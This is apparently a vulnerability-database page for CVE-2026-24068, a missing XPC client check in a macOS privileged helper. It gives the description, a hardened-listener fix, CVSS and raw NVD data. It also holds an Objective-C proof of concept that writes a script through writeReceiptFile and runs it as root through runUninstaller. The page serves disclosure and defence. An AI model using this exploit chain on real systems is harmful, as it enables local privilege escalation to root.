Security Vulnerability Report
CVE-2026-24068 CVSS 8.8 HIGH

Published: 2026-03-26 11:16:20
Last Modified: 2026-04-03 06:16:06
Source: 551230f0-3615-47bd-b7cc-93e92e730bbf

Description

The VSL privileged helper uses NSXPC for IPC. The implementation of the "shouldAcceptNewConnection" function, which the NSXPC framework uses to decide whether a client may connect to the XPC listener, does not validate clients at all. As a result, any process can connect to this service using the configured protocol, and a malicious process can call every function defined in the corresponding HelperToolProtocol. The functions "writeReceiptFile" and "runUninstaller" of the HelperToolProtocol perform no validation either, which allows an attacker to write files to any location with any data and to execute any file with any arguments. Because of the missing XPC client validation described above, any process can call these functions. Abusing the missing endpoint validation leads to privilege escalation.
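A hardened listener for the two gaps described above, as an added example (not VSL's code or the vendor's fix). The protocol signatures, bundle identifier, Team ID, Mach service name and paths are placeholders assumed for illustration, and `setCodeSigningRequirement:` requires macOS 13 or later.

```objective-c
#import <Foundation/Foundation.h>
// Assumed protocol shape: the advisory names the methods, not their signatures.
// The uninstaller call deliberately takes no caller-supplied path or arguments.
@protocol HelperToolProtocol
- (void)writeReceiptFile:(NSString *)name data:(NSData *)data withReply:(void (^)(BOOL ok))reply;
- (void)runUninstallerWithReply:(void (^)(BOOL ok))reply;
@end
// Placeholders (constructed): use the vendor's real identifier, Team ID and paths.
static NSString *const kClientRequirement =
    @"anchor apple generic and identifier \"com.example.client\" "
    @"and certificate leaf[subject.OU] = \"TEAMID1234\"";
static NSString *const kReceiptDir = @"/Library/Application Support/Example/Receipts";
static NSString *const kUninstaller = @"/Library/PrivilegedHelperTools/example-uninstaller";

@interface Helper : NSObject <NSXPCListenerDelegate, HelperToolProtocol>
@end
@implementation Helper
- (BOOL)listener:(NSXPCListener *)l shouldAcceptNewConnection:(NSXPCConnection *)c {
    // Client validation: a peer whose code signature does not satisfy the
    // requirement has its connection invalidated by the framework.
    [c setCodeSigningRequirement:kClientRequirement];
    c.exportedInterface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
    c.exportedObject = self;
    [c resume];
    return YES;
}
- (void)writeReceiptFile:(NSString *)name data:(NSData *)data withReply:(void (^)(BOOL))reply {
    // Function-level validation: bare file name only, written under one fixed
    // root-owned directory, never over an existing file.
    if (name.length == 0 || [name containsString:@"/"] || [name hasPrefix:@"."]) { reply(NO); return; }
    NSString *dest = [kReceiptDir stringByAppendingPathComponent:name];
    reply([data writeToFile:dest options:NSDataWritingWithoutOverwriting error:NULL]);
}
- (void)runUninstallerWithReply:(void (^)(BOOL))reply {
    // Only the fixed uninstaller binary is ever executed, with fixed arguments.
    NSTask *task = [NSTask new];
    task.executableURL = [NSURL fileURLWithPath:kUninstaller];
    task.arguments = @[];
    reply([task launchAndReturnError:NULL]);
}
@end

int main(void) {
    @autoreleasepool {
        Helper *helper = [Helper new];
        NSXPCListener *listener = [[NSXPCListener alloc] initWithMachServiceName:@"com.example.helper"];
        listener.delegate = helper;
        [listener resume];
        [[NSRunLoop currentRunLoop] run];
    }
}
```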

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

VSL: all affected versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
objective-c
// Conceptual PoC for CVE-2026-24068
// This demonstrates how an attacker might interact with the vulnerable XPC service.
#import <Foundation/Foundation.h>

// Define the protocol based on the vulnerability description
@protocol HelperToolProtocol
- (void)writeReceiptFile:(NSString *)path data:(NSData *)data;
- (void)runUninstaller:(NSString *)path arguments:(NSArray<NSString *> *)args;
@end

int main(int argc, const char * argv[]) {
    @autoreleasepool {
        // 1. Connect to the vulnerable XPC service
        // Assuming the service name is com.vsl.helper (hypothetical)
        NSXPCConnection *connection = [[NSXPCConnection alloc] initWithServiceName:@"com.vsl.helper"];
        connection.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
        [connection resume];
        id<HelperToolProtocol> helper = connection.remoteObjectProxy;

        // 2. Write a malicious payload (e.g., a shell script) to an arbitrary location
        NSString *payloadPath = @"/tmp/malicious_update.sh";
        NSString *scriptContent = @"#!/bin/bash\n/usr/bin/touch /tmp/pwned\n";
        NSData *payloadData = [scriptContent dataUsingEncoding:NSUTF8StringEncoding];
        [helper writeReceiptFile:payloadPath data:payloadData];

        // 3. Execute the payload with root privileges using runUninstaller
        // Note: Exploitation depends on the exact method signature and behavior
        [helper runUninstaller:@"/bin/bash" arguments:@[payloadPath]];
        NSLog(@"Exploit attempt sent.");

        // Clean up
        [connection invalidate];
    }
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24068", "sourceIdentifier": "551230f0-3615-47bd-b7cc-93e92e730bbf", "published": "2026-03-26T11:16:20.097", "lastModified": "2026-04-03T06:16:06.463", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The VSL privileged helper does utilize NSXPC for IPC. The implementation of the \"shouldAcceptNewConnection\" function, which is used by the NSXPC framework to validate if a client should be allowed to connect to the XPC listener, does not validate clients at all. This means that any process can connect to this service using the configured protocol. A malicious process is able to call all the functions defined in the corresponding HelperToolProtocol. No validation is performed in the functions \"writeReceiptFile\" and “runUninstaller” of the HelperToolProtocol. This allows an attacker to write files to any location with any data as well as execute any file with any arguments. Any process can call these functions because of the missing XPC client validation described before. The abuse of the missing endpoint validation leads to privilege escalation."}, {"lang": "es", "value": "El asistente privilegiado de VSL utiliza NSXPC para IPC. La implementación de la función 'shouldAcceptNewConnection', que es utilizada por el framework NSXPC para validar si a un cliente se le debe permitir conectarse al oyente XPC, no valida a los clientes en absoluto. Esto significa que cualquier proceso puede conectarse a este servicio utilizando el protocolo configurado. Un proceso malicioso puede llamar a todas las funciones definidas en el HelperToolProtocol correspondiente. No se realiza ninguna validación en las funciones 'writeReceiptFile' y 'runUninstaller' del HelperToolProtocol. Esto permite a un atacante escribir archivos en cualquier ubicación con cualquier dato, así como ejecutar cualquier archivo con cualquier argumento. Cualquier proceso puede llamar a estas funciones debido a la falta de validación del cliente XPC descrita anteriormente. El abuso de la falta de validación del endpoint conduce a la escalada de privilegios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://r.sec-consult.com/vsl", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf"}, {"url": "http://seclists.org/fulldisclosure/2026/Apr/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}